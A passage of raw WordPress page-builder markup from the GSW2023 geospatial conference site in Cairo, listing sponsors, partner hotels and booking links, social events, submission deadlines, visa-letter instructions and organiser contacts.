/></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" 